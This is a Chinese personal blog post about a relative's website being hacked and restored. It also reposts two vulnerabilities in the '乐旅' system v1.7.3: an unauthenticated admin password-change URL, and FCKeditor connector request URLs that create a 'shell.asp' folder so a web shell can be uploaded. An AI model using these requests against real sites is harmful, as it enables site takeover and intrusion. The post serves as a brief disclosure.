前段时间帮我哥做了个站,用的是乐旅的系统,版本1.2。结果今天发现打开异常,晚上没事上来查查也没看到什么,因为上次备份完也没更新多少东西,图省事直接恢复吧,直接在后台设置清空目录,然后连上FTP准备上传。

因为后台清空需要点时间,所以FTP上去的时候才让我看到原来已经有黑客来光顾过了,这小灰阔在里面建了个文件夹,竟然堂而皇之的搭起了blog,我想继续看里面的文件的时候,妈了个逼的,这时候文件正好被清空了,郁闷。

其实前几天乐旅暴漏洞的时候我知道,不过看看版本暴的是1.7的所以也就没关注,没想到在这栽了。

重新上传终于恢复正常了。

乐旅系统v1.7.3漏洞

1.  http://url/admin/Admin_Passod.asp 直接可以修改密码,这种洞都有,最不安全的环节还是人啊。

2. http://url/fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684
http://url/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../connectors/asp/connector.asp

昨天发现之前做的一个关键词竟然不声不响就排到第二了,看来接下来要做其他的啦,呵呵。